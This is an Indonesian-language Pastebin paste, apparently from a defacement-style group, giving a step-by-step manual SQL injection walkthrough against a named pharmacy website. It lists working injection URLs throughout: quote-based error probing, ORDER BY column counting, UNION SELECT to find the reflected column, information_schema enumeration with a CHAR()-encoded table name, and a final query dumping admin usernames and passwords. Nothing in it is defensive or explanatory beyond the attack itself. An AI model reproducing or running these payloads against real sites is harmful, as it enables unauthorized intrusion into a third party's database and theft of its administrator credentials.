Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQLi Pake Jari :::
- :V
- Target => http://www.superpharm.co.tt/test-detail.php?id=2
- kasih tanya petik satu ==> http://www.superpharm.co.tt/test-detail.php?id='2 muncul error
- sekarang cari kolum nya dengan menambahkan +order+by+1--+- jadinya seperti ini ==>
- (tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+1--+-
- (tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+2--+-
- (tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+3--+-
- (tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+4--+-
- (Nah ini error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+5--+-
- ini menunjukan kolom nya cuma ada 4
- ok lanjut sekarang mencari angka injeksi caranya dengan memberi tanda - sebelum angka id jadinya begini karena tadi ditemukan kolumnya ada 4 maka jadinya kek bgini
- http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,2,3,4--+
- nah nongol tuh angka injeksi
- sekarang karena angka injeksi 2 maka cara nampilin data melalui sqlnya kek begini
- http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28table_name%29,3,4+from+information_schema.tables+where+table_schema=database%28%29--
- nah tampil tuh banyak data basenya tapi untuk menuju ke admin berbau username dan password biasanya di administrators pilih deh
- caranya kek begini kaka masuk ke ==> http://www.branah.com/ascii-converter
- lalu masukin administrators ==> add space == pilih yg desimal
- administrators = 97 100 109 105 110 105 115 116 114 97 116 111 114 115
- ok lanjut setelah itu
- buat seperti ini di notepad CHAR(97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114, 115)
- Rubah ==> database() ==> CHAR(97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114, 115)
- Rubah ==> group_concat(table_name) ==> group_concat(column_name)
- Rubah ==> information_schema.tables ==> information_schema.columns
- Rubah ==> table_schema ==> table_name
- jadinya seperti ini
- http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28column_name%29,3,4+from+information_schema.columns+where+table_name=CHAR%2897,%20100,%20109,%20105,%20110,%20105,%20115,%20116,%20114,%2097,%20116,%20111,%20114,%20115%29--+
- ok setelah itu tinggal nampilin username sama passwordnya
- http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28user_name,0x3a,user_password%29,3,4+from+administrators
- Thanks To : Manusia Biasa Team | Unit_31
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement